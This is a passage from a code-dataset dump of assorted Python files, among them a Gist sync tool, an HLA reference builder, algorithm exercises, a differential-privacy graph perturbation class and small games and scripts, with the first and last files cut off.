2.5:\n self.blocks = nn.Sequential(\n group3_partial,\n group4\n )\n elif self.cut_layer == 3:\n self.blocks = nn.Sequential(\n group4\n )\n elif self.cut_layer == 3.5:\n self.blocks = nn.Sequential(\n group4_partial\n )\n else:\n raise ValueError(f'--backbone_block must be 0, 1, 2 or 3. Got {self.cut_layer}')\n\n\n def forward(self, x):\n out = self.blocks(x)\n \n out = self.pool(out)\n out = out.view(x.size(0), -1)\n out = self.final(out)\n return out","repo_name":"TUC-ProAut/fetch","sub_path":"src/backbones/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31655908194","text":"from typing import *\nfrom enum import IntEnum, auto\nimport os\nimport pathlib\nimport logging\n\nfrom typeguard import typechecked\n\nfrom .errors import LocalFileRemovedError, ConflictError, RemoteFileRemovedError\nfrom .abc import IRemoteProvider\nfrom .configs import GLinkConfigs\nfrom .provs.gist import GistProvider\nfrom .utils import sha1_bytes\n\n\nclass SyncWays(IntEnum):\n pull = 1\n push = 2\n twoway = 3\n\n def __str__(self) -> str:\n return self.name\n\n def __format__(self, format_spec: str) -> str:\n return self.name\n\n def to_symbol(self) -> str:\n if self == SyncWays.twoway:\n return '<->'\n elif self == SyncWays.pull:\n return ' ->'\n else:\n return '<- '\n\n\nclass ConflictPolicies(IntEnum):\n unset = auto()\n local = auto()\n remote = auto()\n skip = auto()\n\n def __str__(self) -> str:\n return self.name\n\n def __format__(self, format_spec: str) -> str:\n return self.name\n\ndef _get_providers() -> Dict[str, IRemoteProvider]:\n return dict((x.name, x) for x in [GistProvider()])\n\nclass GLinkApi:\n def __init__(self, conf_root: str=None) -> None:\n self._configs = GLinkConfigs(\n pathlib.Path(conf_root) if conf_root else None\n )\n self._logger = logging.getLogger('glink')\n\n def get_links(self):\n return dict(\n (link_id, self._configs.get_link(link_id=link_id)) for link_id in self._configs.get_all_link_ids()\n )\n\n def get_all_link_ids(self):\n return self._configs.get_all_link_ids()\n\n def remove_link(self, link_id: str):\n self._configs.remove_link(link_id=link_id)\n\n def add_link(self, url: str, local_file: Optional[str], way: SyncWays):\n parsed = [(p, p.parse_url(url)) for p in _get_providers().values()]\n parsed = [(p, r) for p, r in parsed if r]\n\n if not parsed:\n self._logger.error(f'url \"{url}\" does not match any pattern.')\n return\n\n if len(parsed) > 1:\n self._logger.warning(f'url \"{url}\" matched multi patterns:')\n for _, r in parsed:\n self._logger.info(f' - {r.s()}')\n return\n\n prov, rfi = parsed[0]\n\n remote_file = rfi.remote_file\n assert remote_file\n\n if not local_file:\n local_file = os.path.basename(remote_file)\n local_file = os.path.abspath(local_file)\n\n link_id: str = self._configs.add_link(\n prov=prov.name,\n user=rfi.user,\n repo=rfi.repo,\n remote_file=remote_file,\n local_file=local_file,\n way=way.value\n )\n\n self._logger.info(f'link added: {rfi.s()} {way.to_symbol()} {local_file}')\n return link_id\n\n def push_new_gist(self, local_file: str, user: Optional[str], public: bool):\n prov = 'gist'\n\n auth_info = self._configs.read_auth_info(prov, user, allow_default=True)\n if isinstance(auth_info, str):\n access_token = auth_info\n else:\n access_token = None\n\n provider = GistProvider()\n remote_file = os.path.basename(local_file)\n repo = provider.new_gist(\n user=user,\n filename=remote_file,\n content=pathlib.Path(local_file).read_bytes(),\n access_token=access_token,\n public=public\n )\n\n link_id: str = self._configs.add_link(\n prov=prov,\n user=user,\n repo=repo,\n remote_file=remote_file,\n local_file=os.path.abspath(local_file),\n way=SyncWays.twoway.value\n )\n\n self._logger.info(f'link added: gist/{repo}/{remote_file} {SyncWays.twoway.to_symbol()} {local_file}')\n return link_id\n\n @typechecked\n def _sync_one_core(self,\n prov: str, user: str, repo: str, remote_file: str, local_file: str, way: int, sync_state: dict,\n conflict_policy: ConflictPolicies\n ):\n assert way in SyncWays.__members__.values()\n\n provider: IRemoteProvider\n if prov == 'gist':\n provider = GistProvider()\n else:\n raise NotImplementedError\n remote_name = f'{prov}(\"{repo}\")'\n local_name = f'local(\"{local_file}\")'\n\n kwargs = dict(prov=prov, user=user, repo=repo, remote_file=remote_file)\n auth_info = self._configs.read_auth_info(prov, user)\n if isinstance(auth_info, str):\n kwargs['access_token'] = auth_info\n kwargs.setdefault('access_token', None)\n\n remote_version = provider.get_remote_version(**kwargs)\n self._logger.debug(f'current remote version is: {remote_version}.')\n if remote_version != sync_state.get('remote_version'):\n remote_file_content = provider.get_remote_file_content(**kwargs, version=remote_version)\n if remote_file_content is not None:\n remote_file_sha1 = sha1_bytes(remote_file_content)\n elif not sync_state:\n # new link for push\n remote_file_sha1 = None\n else:\n raise RemoteFileRemovedError(f'remote file {remote_file!r} is removed')\n remote_file_changed = remote_file_sha1 != sync_state.get('file_sha1')\n else:\n remote_file_sha1 = None\n remote_file_content = None\n remote_file_changed = False\n\n local_file_pathobj = pathlib.Path(local_file)\n if os.path.isfile(local_file):\n local_file_content = local_file_pathobj.read_bytes()\n local_file_sha1 = sha1_bytes(local_file_content)\n local_file_changed = local_file_sha1 != sync_state.get('file_sha1')\n elif sync_state:\n raise LocalFileRemovedError(f'local file {local_file!r} is removed')\n else:\n local_file_content = None\n local_file_sha1 = None\n local_file_changed = False\n\n file_sha1 = None\n pull, push = False, False\n if remote_file_changed and local_file_changed:\n self._logger.debug(f'both versions is changed.')\n if remote_file_sha1 == local_file_sha1:\n self._logger.info(f'reattach local file \"{local_file}\" as unchanged.')\n file_sha1 = remote_file_sha1\n else:\n if conflict_policy == ConflictPolicies.unset:\n raise ConflictError(f'{local_name} and {remote_name} both changed.')\n elif conflict_policy == ConflictPolicies.local:\n if way == SyncWays.pull:\n self._logger.warning('ignore by pull only.')\n return\n push = True\n else:\n if way == SyncWays.push:\n self._logger.warning('ignore by push only.')\n return\n pull = True\n elif remote_file_changed:\n self._logger.debug(f'remote version is changed.')\n if way == SyncWays.push:\n self._logger.debug('ignore by push only.')\n return\n pull = True\n\n elif local_file_changed:\n self._logger.debug(f'local version is changed.')\n if way == SyncWays.pull:\n self._logger.debug('ignore by pull only.')\n return\n push = True\n\n else:\n self._logger.debug(f'both versions is not changed.')\n return\n\n assert not (pull and push)\n if pull:\n local_file_pathobj.write_bytes(remote_file_content)\n file_sha1 = remote_file_sha1\n self._logger.info(f'pull {remote_name} to {local_name}.')\n elif push:\n remote_version = provider.push_local_file_content(local_file_content=local_file_content, **kwargs)\n file_sha1 = local_file_sha1\n self._logger.info(f'push {local_name} to {remote_name}.')\n\n assert remote_version\n assert file_sha1\n sync_state.update(\n remote_version=remote_version,\n file_sha1=file_sha1\n )\n return True\n\n def sync_one(self, link_id: str, conflict_policy: ConflictPolicies=ConflictPolicies.unset):\n link_data: dict = self._configs.get_link(link_id=link_id)\n if not link_data:\n self._logger.warning(f'no such link: {link_id}')\n return\n sync_state = link_data.setdefault('sync_state', {})\n synced = False\n try:\n synced = self._sync_one_core(conflict_policy=conflict_policy, **link_data)\n except (LocalFileRemovedError, RemoteFileRemovedError) as e:\n self._logger.warning(f'skiped link(\"{link_id}\") because {e.message}.')\n if synced:\n self._configs.save_state(link_id=link_id, sync_state=sync_state)\n","repo_name":"Cologler/glink-python","sub_path":"glink/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37057315141","text":"import random\n\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\nchoice = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\\n\"))\ncomputer = random.randint(0 , 2)\ngame_images = [rock, paper, scissors]\nif choice >= 3 or choice < 0 :\n print(\"You typed an invalid number\")\nelse:\n print(game_images[choice])\n \n if computer == 0:\n print(f\"Computer chose:\\n {rock}\")\n elif computer == 1:\n print(f\"Computer chose:\\n {paper}\")\n else: \n print(f\"Computer chose:\\n {scissors}\")\n \n if choice == computer:\n print(\"Its draw\")\n elif choice == 0 and computer == 1:\n print(\"You lose\")\n elif choice == 0 and computer == 2:\n print(\"You Win\")\n elif choice == 1 and computer == 2:\n print(\"You Lose\")\n elif choice == 1 and computer == 0:\n print(\"You Win\")\n elif choice == 2 and computer == 0:\n print(\"You Lose\")\n elif choice == 2 and computer == 1:\n print(\"You Win\")\n \n\n","repo_name":"Maxsimilian/Python-Bootcamp","sub_path":"Rock-Paper-Scissors Game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39957686665","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------------\n# customize.py: genotypes from extracted chromosome 6 reads.\n#-------------------------------------------------------------------------------\n\n#-------------------------------------------------------------------------------\n# This file is part of arcasHLA.\n#\n# arcasHLA is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# arcasHLA is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with arcasHLA. If not, see .\n#-------------------------------------------------------------------------------\n\nimport os\nimport sys\nimport re\nimport json\nimport pickle\nimport argparse\nimport logging as log\n\nimport numpy as np\nimport math\nimport pandas as pd\n\nfrom datetime import date\nfrom argparse import RawTextHelpFormatter\nfrom textwrap import wrap\nfrom collections import Counter, defaultdict\nfrom itertools import combinations\n\nfrom Bio.Alphabet import generic_dna\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Align import MultipleSeqAlignment\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio import SeqIO\n\nfrom reference import check_ref\nfrom arcas_utilities import *\n\n#-------------------------------------------------------------------------------\n\n__version__ = '0.4.0'\n__date__ = '2022-01-27'\n\n#-------------------------------------------------------------------------------\n# Paths and filenames\n#-------------------------------------------------------------------------------\n\nrootDir = os.path.dirname(os.path.realpath(__file__)) + '/../'\nallele_groups_json = rootDir + 'dat/ref/allele_groups.json'\ncDNA_json = rootDir + 'dat/ref/cDNA.json'\ncDNA_single_json = rootDir + 'dat/ref/cDNA.single.json'\nGRCh38_chr6 = rootDir + 'dat/ref/GRCh38.chr6.noHLA.fasta'\nGRCh38 = rootDir + 'dat/ref/GRCh38.all.noHLA.fasta'\nHLA_json = rootDir + 'dat/ref/hla_transcripts.json'\ndummy_HLA_fa = rootDir + 'dat/ref/GRCh38.chr6.HLA.fasta'\nparameters_json = rootDir + 'dat/info/parameters.json'\n\n#-------------------------------------------------------------------------------\n\ndef build_custom_reference(subject, genotype, grouping, transcriptome_type, temp):\n \n dummy_HLA_dict = SeqIO.to_dict(SeqIO.parse(dummy_HLA_fa, 'fasta')) \n \n if transcriptome_type == 'none':\n transcriptome = []\n elif transcriptome_type == 'chr6':\n transcriptome = list(SeqIO.parse(GRCh38_chr6, 'fasta'))\n else:\n transcriptome = list(SeqIO.parse(GRCh38, 'fasta'))\n \n with open(HLA_json,'r') as file:\n HLA_transcripts = json.load(file)\n \n genes = {allele_id[:-1] for allele_id in genotype.keys()}\n for gene in set(HLA_transcripts) - genes:\n for transcript in HLA_transcripts[gene]:\n transcriptome.append(dummy_HLA_dict[transcript])\n \n #with open(allele_groups_p,'rb') as file:\n # groups = pickle.load(file)\n with open(allele_groups_json,'r') as file:\n groups_temp = json.load(file)\n groups = defaultdict(list)\n for k,v in groups_temp.items():\n groups[k] = set(v)\n\n #with open(cDNA_p,'rb') as file:\n # cDNA = pickle.load(file)\n with open(cDNA_json,'r') as file:\n cDNA_temp = json.load(file)\n cDNA = defaultdict(list)\n for k,v in cDNA_temp.items():\n cDNA[k] = set(v)\n\n #with open(cDNA_single_p,'rb') as file:\n # cDNA_single = pickle.load(file)\n with open(cDNA_single_json,'r') as file:\n cDNA_single = json.load(file)\n \n indv_fasta = ''.join([temp,subject,'.fasta'])\n indv_idx = ''.join([outdir,subject,'.idx'])\n indv_p = ''.join([outdir,subject,'.p'])\n\n indv_records = []\n\n allele_idx = dict()\n lengths = dict()\n genes = defaultdict(list)\n hla_idx = defaultdict(list)\n\n idx = 0\n for allele_id, allele in genotype.items():\n gene = get_gene(allele)\n \n if grouping == 'single':\n sequences = [cDNA_single[allele]]\n elif grouping == 'g-group':\n sequences = [seq for a in groups[allele] for seq in cDNA[a]]\n else:\n sequences = [seq for seq in cDNA[allele]]\n \n for seq in sequences:\n hla_idx[allele_id].append(str(idx))\n genes[gene].append(allele_id)\n allele_idx[str(idx)] = allele_id\n lengths[str(idx)] = len(seq)\n\n record = SeqRecord(Seq(seq),\n id=str(idx),\n description='')\n\n indv_records.append(record)\n idx += 1\n \n for transcript in transcriptome:\n allele_idx[str(idx)] = transcript.id\n lengths[str(idx)] = len(transcript.seq)\n\n record = SeqRecord(transcript.seq,\n id=str(idx),\n description='')\n\n indv_records.append(record)\n idx += 1\n\n SeqIO.write(indv_records, indv_fasta, 'fasta')\n\n with open(indv_p, 'wb') as file:\n pickle.dump([genes,genotype,hla_idx,allele_idx,lengths], file)\n \n\n output = run_command(['kallisto', 'index','-i', indv_idx, indv_fasta])\n print(output.stderr.decode())\n\ndef process_json_genotype(input_genotype, genes):\n genotype = dict()\n for gene, alleles in input_genotype.items():\n if genes and gene not in genes:\n continue\n \n alleles = [process_allele(allele,2) for allele in alleles]\n if len(alleles) == 2:\n genotype[gene + '1'], genotype[gene + '2'] = alleles\n else:\n genotype[gene + '1'] = genotype[gene + '2'] = alleles[0]\n return genotype\n\ndef process_str_genotype(input_genotype, genes):\n genotype = dict()\n for allele in input_genotype.split(','):\n gene = get_gene(allele)\n if genes and gene not in genes:\n continue\n \n if gene + '1' not in genotype:\n genotype[gene + '1'] = process_allele(allele,2)\n elif gene + '2' not in genotype:\n genotype[gene + '2'] = process_allele(allele,2)\n else:\n sys.exit('[quant] Error: more than 2 alleles provided for a gene.')\n run_command(['rm -rf', temp])\n \n return genotype\n \n \nif __name__ == '__main__':\n \n #with open(parameters, 'rb') as file:\n # genes, populations, databases = pickle.load(file)\n with open(parameters_json, 'r') as file:\n genes, populations, _ = json.load(file)\n genes = set(genes)\n populations = set(populations)\n \n parser = argparse.ArgumentParser(prog='arcasHLA customize',\n usage='%(prog)s [options]',\n add_help=False,\n formatter_class=RawTextHelpFormatter)\n \n parser.add_argument('-h',\n '--help', \n action = 'help',\n help = 'show this help message and exit\\n\\n',\n default = argparse.SUPPRESS)\n \n parser.add_argument('-G',\n '--genotype',\n help='comma-separated list of HLA alleles (e.g. A*01:01,A*11:01,...)\\narcasHLA output genotype.json or genotypes.json \\nor tsv with format specified in README.md',\n metavar='',\n type=str)\n \n parser.add_argument('-s',\n '--subject',\n help='subject name, only required for list of alleles',\n default = '',\n metavar='',\n type=str)\n \n parser.add_argument('-g',\n '--genes',\n help='comma separated list of HLA genes\\n'+\n 'default: all\\n' + '\\n'.join(wrap('options: ' +\n ', '.join(sorted(genes)), 60)) +'\\n\\n',\n default='', \n metavar='',\n type=str)\n\n parser.add_argument('--transcriptome', \n type = str,\n help = 'transcripts to include besides input HLAs\\n options: full, chr6, none\\n default: full\\n\\n',\n default='full')\n\n parser.add_argument('--resolution', \n type = int,\n help='genotype resolution, only use >2 when typing performed with assay or Sanger sequencing\\n default: 2\\n\\n',\n default=2)\n \n parser.add_argument('--grouping',\n type = str,\n help = 'type/number of transcripts to include per allele\\n single - one 3-field resolution transcript per allele (e.g. A*01:01:01)\\ng-group - all transcripts with identical binding regions \\n default: protein group - all transcripts with identical protein types (2 fields the same)\\n\\n',\n default='protein-group')\n \n parser.add_argument('-o',\n '--outdir',\n type = str,\n help = 'out directory\\n\\n',\n default = './', \n metavar = '')\n \n parser.add_argument('--temp', \n type = str,\n help = 'temp directory\\n\\n',\n default = '/tmp/', \n metavar = '')\n \n parser.add_argument('--keep_files',\n action = 'count',\n help = 'keep intermediate files\\n\\n',\n default = False)\n \n parser.add_argument('-t',\n '--threads', \n type = str,\n default = '1',\n metavar = '')\n \n\n parser.add_argument('-v',\n '--verbose', \n action = 'count',\n default = False)\n\n args = parser.parse_args()\n \n if args.resolution != 2:\n sys.exit('[customize] only 2-field resolution supported at this time.')\n \n outdir = check_path(args.outdir)\n temp = args.temp\n \n if len(args.genes) > 0:\n genes = set(args.genes.split(','))\n else:\n genes = None\n \n \n if args.genotype.endswith('genotype.json'):\n if args.subject:\n subject = args.subject\n else:\n subject = os.path.basename(args.genotype).split('.')[0]\n\n if args.verbose: print('[customize] Building reference for', subject)\n \n with open(args.genotype, 'r') as file:\n input_genotype = json.load(file)\n \n genotype = process_json_genotype(input_genotype, genes)\n print(genes)\n print(genotype)\n \n build_custom_reference(subject, genotype, args.grouping, args.transcriptome, temp)\n \n elif args.genotype.endswith('.genotypes.json') or args.genotype.endswith('.tsv'):\n temp = create_temp(temp)\n \n if args.verbose: print('[customize] Building references from',os.path.basename(args.genotype))\n \n genotypes = dict()\n if args.genotype.endswith('genotypes.json'):\n with open(args.genotype, 'r') as file:\n input_genotypes = json.load(file)\n for subject, genotype in input_genotypes.items():\n genotype = ','.join(process_json_genotype(genotype, genes).values())\n genotypes[subject] = genotype\n \n else:\n genotypes = pd.read_csv(args.genotype, sep='\\t').set_index('subject').to_dict('index')\n for subject, genotype in genotypes.items():\n if genes:\n genotypes[subject] = ','.join({allele for allele_id, allele in genotypes[subject].items() if allele[:-1] in genes})\n else:\n genotypes[subject] = ','.join(genotype.values())\n subject_file = temp + 'subjects.txt'\n with open(subject_file,'w') as file:\n file.write('\\n'.join([subject + '/' + genotype for subject, genotype in genotypes.items()]))\n command = ['cat', subject_file, '|','parallel', '-j', args.threads,\n rootDir + '/arcasHLA', 'customize', \n '--subject {//}',\n '--genotype {/}',\n '--resolution', args.resolution,\n '--grouping', args.grouping,\n '--transcriptome', args.transcriptome,\n '--outdir', outdir + '/{//}',\n '--temp', temp + '/{//}']\n \n if args.verbose: command.append('--verbose')\n \n print(' '.join([str(i) for i in command]))\n run_command(command)\n \n if not args.keep_files: run_command(['rm -rf', temp])\n \n else:\n genotype = process_str_genotype(args.genotype, genes)\n \n build_custom_reference(args.subject, genotype, args.grouping, args.transcriptome, temp)\n \n\n#-----------------------------------------------------------------------------\n","repo_name":"RabadanLab/arcasHLA","sub_path":"scripts/customize.py","file_name":"customize.py","file_ext":"py","file_size_in_byte":13644,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"63"} +{"seq_id":"71154271882","text":"from LMS.Common.LMS_Block import LMS_Block\r\nfrom LMS.Stream.Reader import Reader\r\nfrom LMS.Common.LMS_Enum import LMS_Types\r\n\r\n\r\nclass TGP2:\r\n \"\"\"A class that represents a TGP2 block in a MSBT file.\r\n\r\n https://github.com/kinnay/Nintendo-File-Formats/wiki/MSBP-File-Format#tgp2-block\"\"\"\r\n\r\n def __init__(self):\r\n self.block: LMS_Block = LMS_Block()\r\n self.parameters: list[dict] = []\r\n\r\n def read(self, reader: Reader) -> None:\r\n \"\"\"Reads the TGP2 block from a stream.\r\n\r\n :param `reader`: A Reader object.\"\"\"\r\n self.block.read_header(reader)\r\n\r\n parameter_count = reader.read_uint16()\r\n reader.skip(2)\r\n # Read the parameters\r\n for offset in self.block.get_item_offsets(reader, parameter_count):\r\n parameter = {}\r\n reader.seek(offset)\r\n type = LMS_Types(reader.read_uint8())\r\n parameter[\"type\"] = type\r\n\r\n if type != LMS_Types.list_index:\r\n parameter[\"name\"] = reader.read_string_nt()\r\n self.parameters.append(parameter)\r\n continue\r\n\r\n reader.skip(1)\r\n list_count = reader.read_uint16()\r\n parameter[\"item_indexes\"] = [\r\n reader.read_uint16() for _ in range(list_count)\r\n ]\r\n parameter[\"name\"] = reader.read_string_nt()\r\n\r\n self.parameters.append(parameter)\r\n\r\n self.block.seek_to_end(reader)\r\n","repo_name":"AbdyyEee/PylibMS","sub_path":"LMS/Project/TGP2.py","file_name":"TGP2.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"29511703737","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Contest: Google Code Jam - 2008 Qualification\n# Problem: B. Train Timetable\n# URL: https://code.google.com/codejam/contest/32013/dashboard#s=p1\n# Author: Masatoshi Ohta\n# Strategy:\n# 貪欲法 (Greedy Algorithm) で地道に実装するだけ。\n# 出発時間の早い順番に列車を出発させていく。\n# このとき、その駅に利用可能な電車がある場合は、その電車を再利用できるため、\n# その駅からの出発カウントはインクリメントしない。\n# 列車を出発させたら、到着先の駅に、利用可能な列車としてキューイングしておく。\nimport sys\nimport heapq\ndef read_int(): return int(sys.stdin.readline())\ndef read_ints(): return [int(x) for x in sys.stdin.readline().split()]\ndef read_strs(): return sys.stdin.readline().split()\n\ndef calc_minutes(hhmm):\n \"\"\"Convert 'HH:MM' to minutes\"\"\"\n return int(hhmm[:2]) * 60 + int(hhmm[3:])\n\ndef solve():\n # Read a problem\n turnaround_time = read_int()\n NA, NB = read_ints()\n\n table = []\n for i in range(NA):\n a = read_strs()\n table.append([calc_minutes(a[0]), calc_minutes(a[1]), 0])\n for i in range(NB):\n a = read_strs()\n table.append([calc_minutes(a[0]), calc_minutes(a[1]), 1])\n table.sort()\n\n start_count = [0, 0] # Result\n available = [[], []] # [ready at A, ready at B]\n for next_train in table:\n pos = next_train[2]\n if available[pos] and available[pos][0] <= next_train[0]:\n # Train is ready\n heapq.heappop(available[pos])\n else:\n # Need to start a new train\n start_count[pos] += 1\n # Modify available trains\n heapq.heappush(available[1-pos], next_train[1] + turnaround_time)\n\n return start_count\n\nif __name__ == '__main__':\n T = read_int()\n for i in range(T):\n print('Case #{}: '.format(i+1) + ' '.join(map(str, solve())))\n","repo_name":"maku77/contest","sub_path":"codejam/2008_Qualification/B-TrainTimetable.py","file_name":"B-TrainTimetable.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39616855680","text":"\nimport heapq\n\nclass Edge:\n def __init__(self, weight, start_vertex, end_vertex):\n self.weight = weight\n self.start_vertex = start_vertex\n self.end_vertex = end_vertex\n\n def __lt__(self, other):\n return self.weight < other.weight\n\nclass Node:\n def __init__(self, name):\n self.name = name\n self.visited = False\n self.adj_list = []\n\n\nclass Prim_Jarnik:\n def __init__(self, vertex_list):\n self.vertex_list = vertex_list\n self.heap = []\n\n\n def find_minimum_spanning_tree(self, start_vertex):\n result_edges = []\n visited_nodes = 0\n total_cost = 0\n\n current_node = start_vertex\n current_node.visited = True\n visited_nodes += 1\n while visited_nodes < len(self.vertex_list):\n for edge in current_node.adj_list:\n if not edge.end_vertex.visited:\n heapq.heappush(self.heap, edge)\n\n min_edge = heapq.heappop(self.heap)\n min_edge.end_vertex.visited = True\n total_cost += min_edge.weight\n visited_nodes += 1\n current_node = min_edge.end_vertex\n result_edges.append(min_edge)\n\n return result_edges, total_cost\n\n\n\n\n","repo_name":"morningbob/algorithms_python","sub_path":"general_algorithms/PrimJarnik/PrimJarnik.py","file_name":"PrimJarnik.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70229809480","text":"#!/usr/bin/python3\n\"\"\"a script that list all states from the database hbtn_0e_0_usa\"\"\"\nimport MySQLdb\nfrom sys import argv\n\n\ndef main():\n \"\"\"a module for setting up DB connection\"\"\"\n host = 'localhost'\n usr = argv[1]\n pwd = argv[2]\n db = argv[3]\n pt = 3306\n\n myDB = MySQLdb.connect(\n host=host,\n user=usr,\n passwd=pwd,\n database=db,\n port=pt\n )\n myDB_cursor = myDB.cursor()\n myquery = (\"SELECT cities.id, cities.name, states.name \"\n \"FROM cities \"\n \"JOIN states \"\n \"ON cities.state_id = states.id \"\n \"ORDER BY cities.id ASC\")\n try:\n myDB_cursor.execute(myquery)\n except Exception:\n return\n\n result = myDB_cursor.fetchall()\n\n for row in result:\n print(row)\n\n myDB_cursor.close()\n myDB.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yusuf-R/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/4-cities_by_state.py","file_name":"4-cities_by_state.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"70909798600","text":"import torch\nimport numpy as np\nfrom torch_sparse import SparseTensor\n\n\nclass AsymmetricRandResponse:\n def __init__(self, eps: float):\n self.eps_link = eps * 0.9\n self.eps_density = eps * 0.1\n\n def __call__(self, adj_t: SparseTensor, chunk_size: int=1000) -> SparseTensor:\n chunks = self.split(adj_t, chunk_size=chunk_size)\n pert_chunks = []\n\n for chunk in chunks: \n chunk_pert = self.perturb(chunk)\n pert_chunks.append(chunk_pert)\n\n perturbed_adj_t = self.merge(pert_chunks, chunk_size=chunk_size)\n return perturbed_adj_t\n \n def split(self, adj_t: SparseTensor, chunk_size: int) -> list[SparseTensor]:\n chunks = []\n for i in range(0, adj_t.size(0), chunk_size):\n if (i + chunk_size) <= adj_t.size(0):\n chunks.append(adj_t[i:i+chunk_size])\n else:\n chunks.append(adj_t[i:])\n return chunks\n \n def perturb(self, adj_t: SparseTensor) -> SparseTensor:\n n = adj_t.size(1)\n sensitivity = 1 / (n*n)\n p = 1 / (1 + np.exp(-self.eps_link))\n d = np.random.laplace(loc=adj_t.density(), scale=sensitivity/self.eps_density)\n q = d / (2*p*d - p - d + 1)\n q = min(1, q)\n pr_1to1 = p * q\n pr_0to1 = (1 - p) * q\n mask = adj_t.to_dense(dtype=bool)\n out = mask * pr_1to1 + (~mask) * pr_0to1\n torch.bernoulli(out, out=out)\n out = SparseTensor.from_dense(out, has_value=False)\n return out\n \n def merge(self, chunks: list[SparseTensor], chunk_size: int) -> SparseTensor:\n n = (len(chunks) - 1) * chunk_size + chunks[-1].size(0)\n m = chunks[0].size(1)\n row = torch.cat([chunk.coo()[0] + i * chunk_size for i, chunk in enumerate(chunks)])\n col = torch.cat([chunk.coo()[1] for chunk in chunks])\n out = SparseTensor(row=row, col=col, sparse_sizes=(n, m))#.coalesce()\n return out\n","repo_name":"thupchnsky/dp-gnn","sub_path":"core/privacy/algorithms/graph/arr.py","file_name":"arr.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"7510347075","text":"from PySide6.QtCore import QObject, Signal, QMutex, QThread\n\n\nlock = QMutex()\n\nclass TaskWorker(QObject):\n range_requested = Signal(int)\n\n def __init__(self):\n super().__init__()\n\n def range_proc(self):\n self.signal = True\n while self.signal:\n self.range_requested.emit(())\n QThread.msleep(80)\n","repo_name":"ieew/vuvu-practise","sub_path":"ui/Thread.py","file_name":"Thread.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10103835326","text":"from .AccountManager import AccountManager\n\n\nclass GlobalInfo:\n def __init__(self):\n self.accountManager = AccountManager()\n self.server_info = {}\n self.question_publisher = None\n self.answer_service = None\n self.game_engine = None\n self.pnl_service = None\n self.mode = 'test' # test final\n self.logger = None\n self.dump_prefix = '/tmp/contest.dump.'\n self.update_interval = 5 # seconds\n","repo_name":"jk983294/Explore","sub_path":"ContestPlatform/contest/server/GlobalInfo.py","file_name":"GlobalInfo.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70073415881","text":"computerScience=[]\r\nnetworking=[]\r\ndesktopSupport=[]\r\nsoftwareProgramming=[]\r\ncomputerSales=[]\r\nacceptedStudents=[computerScience,computerSales,networking,desktopSupport,softwareProgramming]\r\n\r\n\r\nprint(\"###############################################################\")\r\nprint(\"WELCOME TO IT SYSTEMS ACADEMY\")\r\nprint(\"###############################################################\")\r\n#Personal Details\r\nfirstName=input(\"Enter your first name\")\r\nlastName=input(\"Enter your last name\")\r\nage=int(input(\"Enter your age\"))\r\nidNumber=input(\"Enter your id number\")\r\nemailAddress=input(\"Enter your email\")\r\nphoneNumber=input(\"Enter your phone number\")\r\nhomeAddress=input(\"Enter your home address\")\r\n\r\n#Programmes you interested in\r\nprint(\"##############################################################\")\r\nprint(\"We offer the following programmes:\",\"\\n Computer Science \\n Networking \\n Desktop Support \\n Software Programming \\n Computer Sales\")\r\n\r\n#Qualifications\r\n#Prompt the user to enter his grade high school grades\r\nmathsScore=input(\"Enter your Mathematics score\")\r\nfullName= firstName + lastName\r\nwelcomeMessage=\"Hello\"+fullName+\",you have been accepted to study\"\r\n\r\nif mathsScore ==\"A\" :\r\n computerScience.append(fullName)\r\n print(welcomeMessage,\" Computer Science at IT Systems\")\r\nelif mathsScore ==\"B\":\r\n softwareProgramming.append(fullName)\r\n print(welcomeMessage,\" Software Programming at IT Systems\")\r\nelif mathsScore ==\"C\":\r\n networking.append(fullName)\r\n print(welcomeMessage,\" Networking at IT Systems\")\r\nelif mathsScore ==\"D\":\r\n desktopSupport.append(fullName)\r\n print(welcomeMessage,\" Desktop Support at IT 